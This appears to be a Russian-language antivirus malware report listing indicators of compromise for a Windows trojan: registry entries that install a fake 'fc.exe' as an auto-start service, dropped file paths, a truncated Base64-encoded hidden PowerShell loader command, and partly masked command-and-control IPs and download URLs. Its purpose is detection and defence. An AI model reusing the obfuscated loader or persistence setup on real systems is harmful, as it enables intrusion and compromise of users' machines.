Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\fc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\fc] 'ImagePath' = '"%WINDIR%\SysWOW64\netsh\fc.exe"'
- 'fc' "%WINDIR%\SysWOW64\netsh\fc.exe"
- 'fc' %WINDIR%\SysWOW64\netsh\fc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0AdgBBAFIASQBBAEIAbABFACAAIAAoACcAMQBJACcAKwAnADYAdwBlAEwAJwApACAAKAAgAFsAVABZAFAARQBdACgAJwBzACcAKwAnAHkAJwArACcAUwB0AGUAbQAnACsAJwAuAEkAbwAnACsAJwAuAEQAaQ...
- %HOMEPATH%\s4uz2ti\mdmo8iu\z9nwl10.exe
- %WINDIR%\syswow64\netsh\fc.exe
- %HOMEPATH%\s4uz2ti\mdmo8iu\z9nwl10.exe в %WINDIR%\syswow64\netsh\fc.exe
- '19#.#45.25.228':80
- '98.##3.204.12':443
- http://wo##uit.com/ram-aisin/7r9/
- http://ho##iq.com/cgi-bin/Xyv/
- http://bo#####roadesivos.com/gallery_03f59a1cc20096539c7aec1b61d7471a/3e/
- http://98.###.204.12:443/Pn8pP2otk/092HbJHFjB/KwMrV/NeX23nJJOcMGWaY/ via 98.##3.204.12
- DNS ASK wo##uit.com
- DNS ASK ho##iq.com
- DNS ASK bo#####roadesivos.com
- '%HOMEPATH%\s4uz2ti\mdmo8iu\z9nwl10.exe'
- '%WINDIR%\syswow64\netsh\fc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0AdgBBAFIASQBBAEIAbABFACAAIAAoACcAMQBJACcAKwAnADYAdwBlAEwAJwApACAAKAAgAFsAVABZAFAARQBdACgAJwBzACcAKwAnAHkAJwArACcAUwB0AGUAbQAnACsAJwAuAEkAbwAnACsAJwAuAEQAaQ...' (со скрытым окном)